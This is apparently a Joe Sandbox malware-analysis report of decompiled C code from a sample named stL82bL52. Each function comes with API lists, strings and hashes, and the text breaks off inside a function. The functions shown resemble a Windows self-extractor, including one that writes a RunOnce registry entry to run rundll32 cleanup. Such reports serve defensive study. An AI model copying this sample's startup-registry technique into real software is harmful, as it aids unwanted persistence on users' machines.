                                                                                                                                                                                                        0x001f4293
                                                                                                                                                                                                        0x001f42e6
                                                                                                                                                                                                        0x001f42e9
                                                                                                                                                                                                        0x001f42ef
                                                                                                                                                                                                        0x001f42f4
                                                                                                                                                                                                        0x001f42f7
                                                                                                                                                                                                        0x001f4300
                                                                                                                                                                                                        0x001f4307
                                                                                                                                                                                                        0x001f430e
                                                                                                                                                                                                        0x001f4315
                                                                                                                                                                                                        0x001f431c
                                                                                                                                                                                                        0x001f4322
                                                                                                                                                                                                        0x001f4326
                                                                                                                                                                                                        0x001f432d
                                                                                                                                                                                                        0x001f432d
                                                                                                                                                                                                        0x001f432f
                                                                                                                                                                                                        0x001f4334
                                                                                                                                                                                                        0x001f4343
                                                                                                                                                                                                        0x001f4349
                                                                                                                                                                                                        0x001f434d
                                                                                                                                                                                                        0x001f4354
                                                                                                                                                                                                        0x001f4354
                                                                                                                                                                                                        0x001f435d
                                                                                                                                                                                                        0x001f436e
                                                                                                                                                                                                        0x001f436e
                                                                                                                                                                                                        0x001f437d
                                                                                                                                                                                                        0x001f4383
                                                                                                                                                                                                        0x001f4387
                                                                                                                                                                                                        0x001f438e
                                                                                                                                                                                                        0x001f438e
                                                                                                                                                                                                        0x001f4387
                                                                                                                                                                                                        0x001f4391
                                                                                                                                                                                                        0x001f4399
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4295
                                                                                                                                                                                                        0x001f429f
                                                                                                                                                                                                        0x001f42a5
                                                                                                                                                                                                        0x001f42aa
                                                                                                                                                                                                        0x001f42aa
                                                                                                                                                                                                        0x001f42ad
                                                                                                                                                                                                        0x001f42ad
                                                                                                                                                                                                        0x001f42af
                                                                                                                                                                                                        0x001f42b0
                                                                                                                                                                                                        0x001f42b6
                                                                                                                                                                                                        0x001f42c2
                                                                                                                                                                                                        0x001f42c8
                                                                                                                                                                                                        0x001f42ce
                                                                                                                                                                                                        0x001f42e4
                                                                                                                                                                                                        0x001f42e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f42ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 001F4236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 001F424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 001F4263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 001F427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,001F88C0,?,00000001), ref: 001F429F
                                                                                                                                                                                                        • CharPrevA.USER32(001F88C0,003F1181,?,00000001), ref: 001F42C2
                                                                                                                                                                                                        • CharPrevA.USER32(001F88C0,00000000,?,00000001), ref: 001F42D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001F4391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001F43A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 45e2fd9320e62529764362b734a56805af59173d68b2208a3418e1e214e3eb80
                                                                                                                                                                                                        • Instruction ID: b1b9f8e2a54779a18bcf261c4201fbd0bef30e9e4c8beca6107e26a92295a5ea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45e2fd9320e62529764362b734a56805af59173d68b2208a3418e1e214e3eb80
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0441E3B4A00218AFDB11AB64EC88A7E7BB4FF49384F440169EB45A3351CF788C81C761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E001F1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E001F658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E001F658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0x1f1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E001F1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        0x001f2773
                                                                                                                                                                                                        0x001f277e
                                                                                                                                                                                                        0x001f2785
                                                                                                                                                                                                        0x001f278a
                                                                                                                                                                                                        0x001f278d
                                                                                                                                                                                                        0x001f2790
                                                                                                                                                                                                        0x001f2792
                                                                                                                                                                                                        0x001f2798
                                                                                                                                                                                                        0x001f279d
                                                                                                                                                                                                        0x001f28b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f27a3
                                                                                                                                                                                                        0x001f27a3
                                                                                                                                                                                                        0x001f27af
                                                                                                                                                                                                        0x001f27c2
                                                                                                                                                                                                        0x001f27c8
                                                                                                                                                                                                        0x001f27cd
                                                                                                                                                                                                        0x001f27d5
                                                                                                                                                                                                        0x001f28b7
                                                                                                                                                                                                        0x001f28b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f27db
                                                                                                                                                                                                        0x001f27dd
                                                                                                                                                                                                        0x001f28aa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f27e3
                                                                                                                                                                                                        0x001f27e3
                                                                                                                                                                                                        0x001f27ec
                                                                                                                                                                                                        0x001f27f8
                                                                                                                                                                                                        0x001f2803
                                                                                                                                                                                                        0x001f280b
                                                                                                                                                                                                        0x001f2831
                                                                                                                                                                                                        0x001f28c3
                                                                                                                                                                                                        0x001f28c9
                                                                                                                                                                                                        0x001f28cd
                                                                                                                                                                                                        0x001f2837
                                                                                                                                                                                                        0x001f285a
                                                                                                                                                                                                        0x001f285c
                                                                                                                                                                                                        0x001f2865
                                                                                                                                                                                                        0x001f2892
                                                                                                                                                                                                        0x001f2895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2867
                                                                                                                                                                                                        0x001f2878
                                                                                                                                                                                                        0x001f288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f287a
                                                                                                                                                                                                        0x001f2880
                                                                                                                                                                                                        0x001f2885
                                                                                                                                                                                                        0x001f2897
                                                                                                                                                                                                        0x001f2899
                                                                                                                                                                                                        0x001f2899
                                                                                                                                                                                                        0x001f2878
                                                                                                                                                                                                        0x001f2865
                                                                                                                                                                                                        0x001f28a0
                                                                                                                                                                                                        0x001f28bf
                                                                                                                                                                                                        0x001f28c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f28c1
                                                                                                                                                                                                        0x001f2831
                                                                                                                                                                                                        0x001f27dd
                                                                                                                                                                                                        0x001f27d5
                                                                                                                                                                                                        0x001f28e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(FCDC6E1A,00000000,00000000,00000000), ref: 001F27A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 001F27B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 001F27BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,001F1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F28A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001F28AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F28B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001F27E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: b2f13987021b10bec330e1a7b2a4010690ddd182cff8a8ddb3f6bf35d6814ec0
                                                                                                                                                                                                        • Instruction ID: f1ec42e36d7ca70d1c052d436961ad53173546263d082cfe815f3aac85742083
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2f13987021b10bec330e1a7b2a4010690ddd182cff8a8ddb3f6bf35d6814ec0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E741A0B1A0012CAFDB249B649C85AFA7BBDEF15740F4440A9F649E2110DB748EC6CFA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E001F2267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0x1f8530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E001F658A( &_v268, 0x104, 0x1f1140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        							E001F171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x001f2272
                                                                                                                                                                                                        0x001f2277
                                                                                                                                                                                                        0x001f2279
                                                                                                                                                                                                        0x001f2283
                                                                                                                                                                                                        0x001f2289
                                                                                                                                                                                                        0x001f22ab
                                                                                                                                                                                                        0x001f22b1
                                                                                                                                                                                                        0x001f22c4
                                                                                                                                                                                                        0x001f22e0
                                                                                                                                                                                                        0x001f22e6
                                                                                                                                                                                                        0x001f22f5
                                                                                                                                                                                                        0x001f230d
                                                                                                                                                                                                        0x001f231c
                                                                                                                                                                                                        0x001f231c
                                                                                                                                                                                                        0x001f2321
                                                                                                                                                                                                        0x001f233a
                                                                                                                                                                                                        0x001f2342
                                                                                                                                                                                                        0x001f2348
                                                                                                                                                                                                        0x001f234b
                                                                                                                                                                                                        0x001f234c
                                                                                                                                                                                                        0x001f234c
                                                                                                                                                                                                        0x001f234e
                                                                                                                                                                                                        0x001f234f
                                                                                                                                                                                                        0x001f236e
                                                                                                                                                                                                        0x001f236e
                                                                                                                                                                                                        0x001f237a
                                                                                                                                                                                                        0x001f2380
                                                                                                                                                                                                        0x001f2380
                                                                                                                                                                                                        0x001f2381
                                                                                                                                                                                                        0x001f2381
                                                                                                                                                                                                        0x001f238f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001F22A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 001F22D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F22F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F2305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 001F236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 001F237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001F2321
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 001F232D
                                                                                                                                                                                                        • wextract_cleanup2, xrefs: 001F227C, 001F22CD, 001F2363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 001F2299
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 3027380567-1720115735
                                                                                                                                                                                                        • Opcode ID: 81edde00839590907859318e3114e2ed123f28c60f77a4dac3372bb8c5d3cb40
                                                                                                                                                                                                        • Instruction ID: 70a890611a6e6b27ace8c9f1dee23b4289fbb4d3756fb2aed4a5e4727692d563
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81edde00839590907859318e3114e2ed123f28c60f77a4dac3372bb8c5d3cb40
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A3193B1A0021CABDB219B61DC49FFA7B7CEF59740F4001A9F64DA6051EF75AB88CA50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E001F3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0x1f8590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0x1f8590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E001F43D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0x1f8d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0x1f88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E001F30C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x001f3108
                                                                                                                                                                                                        0x001f310b
                                                                                                                                                                                                        0x001f31b7
                                                                                                                                                                                                        0x001f31ca
                                                                                                                                                                                                        0x001f31d0
                                                                                                                                                                                                        0x001f31d0
                                                                                                                                                                                                        0x001f31da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f31da
                                                                                                                                                                                                        0x001f3111
                                                                                                                                                                                                        0x001f3114
                                                                                                                                                                                                        0x001f3136
                                                                                                                                                                                                        0x001f3136
                                                                                                                                                                                                        0x001f3138
                                                                                                                                                                                                        0x001f313b
                                                                                                                                                                                                        0x001f3141
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3143
                                                                                                                                                                                                        0x001f3116
                                                                                                                                                                                                        0x001f311b
                                                                                                                                                                                                        0x001f314b
                                                                                                                                                                                                        0x001f3151
                                                                                                                                                                                                        0x001f3158
                                                                                                                                                                                                        0x001f316a
                                                                                                                                                                                                        0x001f3176
                                                                                                                                                                                                        0x001f317d
                                                                                                                                                                                                        0x001f318b
                                                                                                                                                                                                        0x001f319e
                                                                                                                                                                                                        0x001f31a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f31ad
                                                                                                                                                                                                        0x001f3120
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f312a
                                                                                                                                                                                                        0x001f3134
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3134
                                                                                                                                                                                                        0x001f312c
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 001F313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 001F316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 001F3176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 001F317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 001F3185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 001F3190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,001F30C0), ref: 001F31A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001F31CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 3785188418-3940384054
                                                                                                                                                                                                        • Opcode ID: 967dce6e63ab32c142abf76894029c8c61b0bdf0fdf5691e97dcdeef2a715820
                                                                                                                                                                                                        • Instruction ID: 9e5608f80a4eaf189795f9d2339a37f860c6af16e377028d940bc980e29fbe5b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 967dce6e63ab32c142abf76894029c8c61b0bdf0fdf5691e97dcdeef2a715820
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4411D37124C219BBDB116F24DC0CBBA3A64FF4A720F514611FA2A919E0DB799681C742
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E001F18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
